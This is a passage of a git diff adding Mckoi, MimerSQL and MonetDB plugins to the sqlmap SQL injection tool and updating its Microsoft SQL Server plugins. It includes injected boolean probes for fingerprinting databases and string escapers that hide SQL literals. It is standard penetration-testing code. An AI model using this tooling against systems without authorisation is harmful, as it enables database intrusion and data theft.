searchDb(self): + warnMsg = "on Mckoi it is not possible to search databases" + logger.warning(warnMsg) + + return [] + + def searchTable(self): + warnMsg = "on Mckoi it is not possible to search tables" + logger.warning(warnMsg) + + return [] + + def searchColumn(self): + warnMsg = "on Mckoi it is not possible to search columns" + logger.warning(warnMsg) + + return [] + + def search(self): + warnMsg = "on Mckoi search option is not available" + logger.warning(warnMsg) + + def getHostname(self): + warnMsg = "on Mckoi it is not possible to enumerate the hostname" + logger.warning(warnMsg) + + def getStatements(self): + warnMsg = "on Mckoi it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] diff --git a/plugins/dbms/mckoi/filesystem.py b/plugins/dbms/mckoi/filesystem.py new file mode 100644 index 00000000000..66d946579f4 --- /dev/null +++ b/plugins/dbms/mckoi/filesystem.py @@ -0,0 +1,18 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + def readFile(self, remoteFile): + errMsg = "on Mckoi it is not possible to read files" + raise SqlmapUnsupportedFeatureException(errMsg) + + def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): + errMsg = "on Mckoi it is not possible to write files" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/mckoi/fingerprint.py b/plugins/dbms/mckoi/fingerprint.py new file mode 100644 index 00000000000..312f3e3c16f --- /dev/null +++ b/plugins/dbms/mckoi/fingerprint.py @@ -0,0 +1,93 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import MCKOI_ALIASES +from lib.core.settings import MCKOI_DEFAULT_SCHEMA +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.MCKOI) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.MCKOI + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(MCKOI_ALIASES): + setDbms(DBMS.MCKOI) + return True + + infoMsg = "testing %s" % DBMS.MCKOI + logger.info(infoMsg) + + result = inject.checkBooleanExpression("DATEOB()>=DATEOB(NULL)") + + if result: + infoMsg = "confirming %s" % DBMS.MCKOI + logger.info(infoMsg) + + result = inject.checkBooleanExpression("ABS(1/0)>ABS(0/1)") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.MCKOI + logger.warning(warnMsg) + + return False + + setDbms(DBMS.MCKOI) + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.MCKOI + logger.warning(warnMsg) + + return False + + def forceDbmsEnum(self): + conf.db = MCKOI_DEFAULT_SCHEMA diff --git a/plugins/dbms/mckoi/syntax.py b/plugins/dbms/mckoi/syntax.py new file mode 100644 index 00000000000..17a0a02c257 --- /dev/null +++ b/plugins/dbms/mckoi/syntax.py @@ -0,0 +1,18 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT 'abcdefgh' FROM foobar" + True + """ + + return expression diff --git a/plugins/dbms/mckoi/takeover.py b/plugins/dbms/mckoi/takeover.py new file mode 100644 index 00000000000..d22277b674d --- /dev/null +++ b/plugins/dbms/mckoi/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on Mckoi it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on Mckoi it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on Mckoi it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on Mckoi it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/mimersql/__init__.py b/plugins/dbms/mimersql/__init__.py new file mode 100644 index 00000000000..af8f2232ea5 --- /dev/null +++ b/plugins/dbms/mimersql/__init__.py @@ -0,0 +1,30 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import MIMERSQL_SYSTEM_DBS +from lib.core.unescaper import unescaper + +from plugins.dbms.mimersql.enumeration import Enumeration +from plugins.dbms.mimersql.filesystem import Filesystem +from plugins.dbms.mimersql.fingerprint import Fingerprint +from plugins.dbms.mimersql.syntax import Syntax +from plugins.dbms.mimersql.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class MimerSQLMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines MimerSQL methods + """ + + def __init__(self): + self.excludeDbsList = MIMERSQL_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.MIMERSQL] = Syntax.escape diff --git a/plugins/dbms/mimersql/connector.py b/plugins/dbms/mimersql/connector.py new file mode 100644 index 00000000000..e6bcced6b96 --- /dev/null +++ b/plugins/dbms/mimersql/connector.py @@ -0,0 +1,59 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +try: + import mimerpy +except: + pass + +import logging + +from lib.core.common import getSafeExString +from lib.core.data import conf +from lib.core.data import logger +from lib.core.exception import SqlmapConnectionException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + """ + Homepage: https://github.com/mimersql/MimerPy + User guide: https://github.com/mimersql/MimerPy/blob/master/README.rst + API: https://www.python.org/dev/peps/pep-0249/ + License: MIT + """ + + def connect(self): + self.initConnection() + + try: + self.connector = mimerpy.connect(hostname=self.hostname, username=self.user, password=self.password, database=self.db, port=self.port, connect_timeout=conf.timeout) + except mimerpy.OperationalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.initCursor() + self.printConnected() + + def fetchall(self): + try: + return self.cursor.fetchall() + except mimerpy.ProgrammingError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + return None + + def execute(self, query): + try: + self.cursor.execute(query) + except (mimerpy.OperationalError, mimerpy.ProgrammingError) as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + except mimerpy.InternalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.connector.commit() + + def select(self, query): + self.execute(query) + return self.fetchall() diff --git a/plugins/dbms/mimersql/enumeration.py b/plugins/dbms/mimersql/enumeration.py new file mode 100644 index 00000000000..85ea9c93f28 --- /dev/null +++ b/plugins/dbms/mimersql/enumeration.py @@ -0,0 +1,32 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import logger +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getPasswordHashes(self): + warnMsg = "on MimerSQL it is not possible to enumerate password hashes" + logger.warning(warnMsg) + + return {} + + def getStatements(self): + warnMsg = "on MimerSQL it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] + + def getRoles(self, *args, **kwargs): + warnMsg = "on MimerSQL it is not possible to enumerate the user roles" + logger.warning(warnMsg) + + return {} + + def getHostname(self): + warnMsg = "on MimerSQL it is not possible to enumerate the hostname" + logger.warning(warnMsg) diff --git a/plugins/dbms/mimersql/filesystem.py b/plugins/dbms/mimersql/filesystem.py new file mode 100644 index 00000000000..2e61d83c07c --- /dev/null +++ b/plugins/dbms/mimersql/filesystem.py @@ -0,0 +1,11 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + pass diff --git a/plugins/dbms/mimersql/fingerprint.py b/plugins/dbms/mimersql/fingerprint.py new file mode 100644 index 00000000000..3372a8fe7b0 --- /dev/null +++ b/plugins/dbms/mimersql/fingerprint.py @@ -0,0 +1,94 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import MIMERSQL_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.MIMERSQL) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.MIMERSQL + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(MIMERSQL_ALIASES): + setDbms(DBMS.MIMERSQL) + + self.getBanner() + + return True + + infoMsg = "testing %s" % DBMS.MIMERSQL + logger.info(infoMsg) + + result = inject.checkBooleanExpression("IRAND() IS NOT NULL") + + if result: + infoMsg = "confirming %s" % DBMS.MIMERSQL + logger.info(infoMsg) + + result = inject.checkBooleanExpression("PASTE('[RANDSTR1]',0,0,'[RANDSTR2]')='[RANDSTR2][RANDSTR1]'") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.MIMERSQL + logger.warning(warnMsg) + + return False + + setDbms(DBMS.MIMERSQL) + + self.getBanner() + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.MIMERSQL + logger.warning(warnMsg) + + return False diff --git a/plugins/dbms/mimersql/syntax.py b/plugins/dbms/mimersql/syntax.py new file mode 100644 index 00000000000..8257c9af870 --- /dev/null +++ b/plugins/dbms/mimersql/syntax.py @@ -0,0 +1,23 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.convert import getOrds +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> from lib.core.common import Backend + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT UNICODE_CHAR(97)||UNICODE_CHAR(98)||UNICODE_CHAR(99)||UNICODE_CHAR(100)||UNICODE_CHAR(101)||UNICODE_CHAR(102)||UNICODE_CHAR(103)||UNICODE_CHAR(104) FROM foobar" + True + """ + + def escaper(value): + return "||".join("UNICODE_CHAR(%d)" % _ for _ in getOrds(value)) + + return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/mimersql/takeover.py b/plugins/dbms/mimersql/takeover.py new file mode 100644 index 00000000000..7055371b8c5 --- /dev/null +++ b/plugins/dbms/mimersql/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on MimerSQL it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on MimerSQL it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on MimerSQL it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on MimerSQL it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/monetdb/__init__.py b/plugins/dbms/monetdb/__init__.py new file mode 100644 index 00000000000..200b23b290f --- /dev/null +++ b/plugins/dbms/monetdb/__init__.py @@ -0,0 +1,30 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import MONETDB_SYSTEM_DBS +from lib.core.unescaper import unescaper + +from plugins.dbms.monetdb.enumeration import Enumeration +from plugins.dbms.monetdb.filesystem import Filesystem +from plugins.dbms.monetdb.fingerprint import Fingerprint +from plugins.dbms.monetdb.syntax import Syntax +from plugins.dbms.monetdb.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class MonetDBMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines MonetDB methods + """ + + def __init__(self): + self.excludeDbsList = MONETDB_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.MONETDB] = Syntax.escape diff --git a/plugins/dbms/monetdb/connector.py b/plugins/dbms/monetdb/connector.py new file mode 100644 index 00000000000..66a6bcdf8eb --- /dev/null +++ b/plugins/dbms/monetdb/connector.py @@ -0,0 +1,59 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +try: + import pymonetdb +except: + pass + +import logging + +from lib.core.common import getSafeExString +from lib.core.data import conf +from lib.core.data import logger +from lib.core.exception import SqlmapConnectionException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + """ + Homepage: https://github.com/gijzelaerr/pymonetdb + User guide: https://pymonetdb.readthedocs.io/en/latest/index.html + API: https://www.python.org/dev/peps/pep-0249/ + License: Mozilla Public License 2.0 + """ + + def connect(self): + self.initConnection() + + try: + self.connector = pymonetdb.connect(hostname=self.hostname, username=self.user, password=self.password, database=self.db, port=self.port, connect_timeout=conf.timeout) + except pymonetdb.OperationalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.initCursor() + self.printConnected() + + def fetchall(self): + try: + return self.cursor.fetchall() + except pymonetdb.ProgrammingError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + return None + + def execute(self, query): + try: + self.cursor.execute(query) + except (pymonetdb.OperationalError, pymonetdb.ProgrammingError) as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + except pymonetdb.InternalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.connector.commit() + + def select(self, query): + self.execute(query) + return self.fetchall() diff --git a/plugins/dbms/monetdb/enumeration.py b/plugins/dbms/monetdb/enumeration.py new file mode 100644 index 00000000000..8634adab8d6 --- /dev/null +++ b/plugins/dbms/monetdb/enumeration.py @@ -0,0 +1,38 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import logger +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getPasswordHashes(self): + warnMsg = "on MonetDB it is not possible to enumerate password hashes" + logger.warning(warnMsg) + + return {} + + def getStatements(self): + warnMsg = "on MonetDB it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] + + def getPrivileges(self, *args, **kwargs): + warnMsg = "on MonetDB it is not possible to enumerate the user privileges" + logger.warning(warnMsg) + + return {} + + def getRoles(self, *args, **kwargs): + warnMsg = "on MonetDB it is not possible to enumerate the user roles" + logger.warning(warnMsg) + + return {} + + def getHostname(self): + warnMsg = "on MonetDB it is not possible to enumerate the hostname" + logger.warning(warnMsg) diff --git a/plugins/dbms/monetdb/filesystem.py b/plugins/dbms/monetdb/filesystem.py new file mode 100644 index 00000000000..2e61d83c07c --- /dev/null +++ b/plugins/dbms/monetdb/filesystem.py @@ -0,0 +1,11 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + pass diff --git a/plugins/dbms/monetdb/fingerprint.py b/plugins/dbms/monetdb/fingerprint.py new file mode 100644 index 00000000000..83c065d18b4 --- /dev/null +++ b/plugins/dbms/monetdb/fingerprint.py @@ -0,0 +1,94 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import MONETDB_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.MONETDB) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.MONETDB + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(MONETDB_ALIASES): + setDbms(DBMS.MONETDB) + + self.getBanner() + + return True + + infoMsg = "testing %s" % DBMS.MONETDB + logger.info(infoMsg) + + result = inject.checkBooleanExpression("isaurl(NULL)=false") + + if result: + infoMsg = "confirming %s" % DBMS.MONETDB + logger.info(infoMsg) + + result = inject.checkBooleanExpression("CODE(0) IS NOT NULL") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.MONETDB + logger.warning(warnMsg) + + return False + + setDbms(DBMS.MONETDB) + + self.getBanner() + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.MONETDB + logger.warning(warnMsg) + + return False diff --git a/plugins/dbms/monetdb/syntax.py b/plugins/dbms/monetdb/syntax.py new file mode 100644 index 00000000000..e93396d6e9f --- /dev/null +++ b/plugins/dbms/monetdb/syntax.py @@ -0,0 +1,23 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.convert import getOrds +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> from lib.core.common import Backend + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CODE(97)||CODE(98)||CODE(99)||CODE(100)||CODE(101)||CODE(102)||CODE(103)||CODE(104) FROM foobar" + True + """ + + def escaper(value): + return "||".join("CODE(%d)" % _ for _ in getOrds(value)) + + return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/monetdb/takeover.py b/plugins/dbms/monetdb/takeover.py new file mode 100644 index 00000000000..bf0fa25305c --- /dev/null +++ b/plugins/dbms/monetdb/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on MonetDB it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on MonetDB it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on MonetDB it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on MonetDB it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/mssqlserver/__init__.py b/plugins/dbms/mssqlserver/__init__.py index 7dee4fe9872..e19a115f887 100644 --- a/plugins/dbms/mssqlserver/__init__.py +++ b/plugins/dbms/mssqlserver/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.enums import DBMS @@ -15,7 +15,6 @@ from plugins.dbms.mssqlserver.takeover import Takeover from plugins.generic.misc import Miscellaneous - class MSSQLServerMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): """ This class defines Microsoft SQL Server methods @@ -24,11 +23,7 @@ class MSSQLServerMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous def __init__(self): self.excludeDbsList = MSSQL_SYSTEM_DBS - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) + for cls in self.__class__.__bases__: + cls.__init__(self) unescaper[DBMS.MSSQL] = Syntax.escape diff --git a/plugins/dbms/mssqlserver/connector.py b/plugins/dbms/mssqlserver/connector.py index 7eb0a82bb7c..f49cabaa646 100644 --- a/plugins/dbms/mssqlserver/connector.py +++ b/plugins/dbms/mssqlserver/connector.py @@ -1,19 +1,20 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ try: import _mssql import pymssql -except ImportError: +except: pass import logging -from lib.core.convert import utf8encode +from lib.core.common import getSafeExString +from lib.core.convert import getText from lib.core.data import conf from lib.core.data import logger from lib.core.exception import SqlmapConnectionException @@ -21,9 +22,9 @@ class Connector(GenericConnector): """ - Homepage: http://pymssql.sourceforge.net/ - User guide: http://pymssql.sourceforge.net/examples_pymssql.php - API: http://pymssql.sourceforge.net/ref_pymssql.php + Homepage: http://www.pymssql.org/en/stable/ + User guide: http://www.pymssql.org/en/stable/pymssql_examples.html + API: http://www.pymssql.org/en/stable/ref/pymssql.html Debian package: python-pymssql License: LGPL @@ -33,37 +34,36 @@ class Connector(GenericConnector): to work, get it from http://sourceforge.net/projects/pymssql/files/pymssql/1.0.2/ """ - def __init__(self): - GenericConnector.__init__(self) - def connect(self): self.initConnection() try: self.connector = pymssql.connect(host="%s:%d" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout) - except (pymssql.InterfaceError, pymssql.OperationalError), msg: - raise SqlmapConnectionException(msg) + except (pymssql.Error, _mssql.MssqlDatabaseException) as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + except ValueError: + raise SqlmapConnectionException self.initCursor() - self.connected() + self.printConnected() def fetchall(self): try: return self.cursor.fetchall() - except (pymssql.ProgrammingError, pymssql.OperationalError, _mssql.MssqlDatabaseException), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % str(msg).replace("\n", " ")) + except (pymssql.Error, _mssql.MssqlDatabaseException) as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) '%s'" % getSafeExString(ex).replace("\n", " ")) return None def execute(self, query): retVal = False try: - self.cursor.execute(utf8encode(query)) + self.cursor.execute(getText(query)) retVal = True - except (pymssql.OperationalError, pymssql.ProgrammingError), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % str(msg).replace("\n", " ")) - except pymssql.InternalError, msg: - raise SqlmapConnectionException(msg) + except (pymssql.OperationalError, pymssql.ProgrammingError) as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) '%s'" % getSafeExString(ex).replace("\n", " ")) + except pymssql.InternalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) return retVal diff --git a/plugins/dbms/mssqlserver/enumeration.py b/plugins/dbms/mssqlserver/enumeration.py index 5131f2b45dd..28de4c5d672 100644 --- a/plugins/dbms/mssqlserver/enumeration.py +++ b/plugins/dbms/mssqlserver/enumeration.py @@ -1,42 +1,45 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import re + from lib.core.agent import agent from lib.core.common import arrayizeValue -from lib.core.common import Backend from lib.core.common import getLimitRange from lib.core.common import isInferenceAvailable from lib.core.common import isNoneValue from lib.core.common import isNumPosStrValue from lib.core.common import isTechniqueAvailable from lib.core.common import safeSQLIdentificatorNaming +from lib.core.common import safeStringFormat +from lib.core.common import singleTimeLogMessage +from lib.core.common import unArrayizeValue from lib.core.common import unsafeSQLIdentificatorNaming +from lib.core.compat import xrange from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries from lib.core.enums import CHARSET_TYPE +from lib.core.enums import DBMS from lib.core.enums import EXPECTED from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapNoneDataException from lib.core.settings import CURRENT_DB from lib.request import inject - from plugins.generic.enumeration import Enumeration as GenericEnumeration +from thirdparty import six class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - - def getPrivileges(self, *args): + def getPrivileges(self, *args, **kwargs): warnMsg = "on Microsoft SQL Server it is not possible to fetch " warnMsg += "database users privileges, sqlmap will check whether " warnMsg += "or not the database users are database administrators" - logger.warn(warnMsg) + logger.warning(warnMsg) users = [] areAdmins = set() @@ -49,6 +52,8 @@ def getPrivileges(self, *args): users = kb.data.cachedUsers for user in users: + user = unArrayizeValue(user) + if user is None: continue @@ -71,27 +76,31 @@ def getTables(self): conf.db = self.getCurrentDb() if conf.db: - dbs = conf.db.split(",") + dbs = conf.db.split(',') else: dbs = self.getDbs() for db in dbs: dbs[dbs.index(db)] = safeSQLIdentificatorNaming(db) - dbs = filter(None, dbs) + dbs = [_ for _ in dbs if _] infoMsg = "fetching tables for database" - infoMsg += "%s: %s" % ("s" if len(dbs) > 1 else "", ", ".join(db if isinstance(db, basestring) else db[0] for db in sorted(dbs))) + infoMsg += "%s: %s" % ("s" if len(dbs) > 1 else "", ", ".join(db if isinstance(db, six.string_types) else db[0] for db in sorted(dbs))) logger.info(infoMsg) - rootQuery = queries[Backend.getIdentifiedDbms()].tables + rootQuery = queries[DBMS.MSSQL].tables if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: for db in dbs: if conf.excludeSysDbs and db in self.excludeDbsList: infoMsg = "skipping system database '%s'" % db - logger.info(infoMsg) + singleTimeLogMessage(infoMsg) + continue + if conf.exclude and re.search(conf.exclude, db, re.I) is not None: + infoMsg = "skipping database '%s'" % db + singleTimeLogMessage(infoMsg) continue for query in (rootQuery.inband.query, rootQuery.inband.query2, rootQuery.inband.query3): @@ -101,16 +110,20 @@ def getTables(self): break if not isNoneValue(value): - value = filter(None, arrayizeValue(value)) - value = [safeSQLIdentificatorNaming(_, True) for _ in value] + value = [_ for _ in 